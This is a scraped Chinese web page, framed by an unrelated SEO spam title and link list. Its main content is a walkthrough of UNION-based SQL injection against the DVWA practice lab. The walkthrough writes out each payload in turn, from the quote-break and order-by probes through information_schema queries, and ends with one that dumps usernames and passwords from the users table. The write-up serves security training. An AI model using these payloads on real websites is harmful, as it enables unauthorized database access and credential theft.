当前位置: 首页 > news >正文

长春市工程咨询有限公司seo排名优化工具推荐

长春市工程咨询有限公司,seo排名优化工具推荐,如何仿做别人的网站,cms网站群管理系统本次注入的是DVWA靶场的SQL injection 1.判断是字符型注入还是数字型注入,构造SQL语句 1 and 12 由此可以判断出为字符型注入 2.考虑闭合方式,先随便丢一个单引号试试看看报错提示 You have an error in your SQL syntax; check the manual that cor…

本次注入的是DVWA靶场的SQL injection

1.判断是字符型注入还是数字型注入,构造SQL语句

1 and 1=2

由此可以判断出为字符型注入

2.考虑闭合方式,先随便丢一个单引号试试看看报错提示

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

根据报错提示可以看出是引号进行包括的值

3.判断输出的列数,使用order by函数与二分法

可以判断出列数为2

4.联合查询,尝试查看内容回显的地方

构造SQL语句 -1' union select 1,2 #

可以看到回显内容的地方是First name与Surname

查询出数据库 -1' union select 1,database() #

查询出数据表-1' union select 1,group_concat(hex(table_name)) from information_schema.tables where table_schema='dvwa' #

得到两个值去hex解码分别是 guestbook,users这两个也是DVWA数据库下面的所有表名,根据表的名字就可以判断出账号与密码存储在了users这个表里面,所以我们要对这个表进行查询,查询这个表里面的所有字段,开始构造SQL语句

-1' union select 1,group_concat(hex(column_name)) from information_schema.columns where table_schema='dvwa' and table_name='users' #

得到了表下面的所有字段内容

对这些内容分别进行解码,将要查询的字段提取出来,分别是user与password,再次构造SQL语句对这两个字段的内容进行查询

-1' union select 1,group_concat(user,'-',password) from dvwa.users #

成功注入出账号与密码。

http://www.zhongyajixie.com/news/30517.html

相关文章:

  • element ui做的网站外链价格
  • 在哪里学做网站搜索 引擎优化
  • 网站建设注意营销策划书格式及范文
  • 金泉网站建设开发小程序怎么开发
  • wordpress简单统计插件排名优化软件
  • 广州的十七做网站免费自动推广手机软件
  • 做网站用什么格式做好网站制作工具
  • 专业做调查的网站百度推广步骤
  • 重庆网站建设是什么百度识图搜索网页版
  • 溧水做网站青岛网站制作seo
  • 专业做网站哪家强网站优化公司收费
  • 做网站需要什么样的服务器成都疫情最新消息
  • 优美网站源码福州百度快照优化
  • 现在网站的外部链接怎么做企业管理培训
  • 团购网站前景旧版优化大师
  • asp做网站主要技术seo是如何做优化的
  • 什么是网络营销例子西安seo服务外包
  • 济南做网站优化价格网络营销工资一般多少
  • 网站设计公司建设南昌seo顾问
  • 模板做网站seo网站营销公司哪家好
  • 怎么给网站做备份呢seo 深圳
  • 淄博网站建设相关文章域名历史查询工具
  • 那个网站可以做软件出售的seo厂家电话
  • 仿魔客吧网站模板网络搜索工具
  • 经典编辑器wordpressseo报名在线咨询
  • 铭做网站建设sem 推广软件
  • 兰溪优秀高端网站设计地址网站如何推广出去
  • 一起做网店的类似网站淘宝指数转换工具
  • 漯河专业做网站的公司网络营销的发展趋势
  • 做特产的网站百度竞价怎么做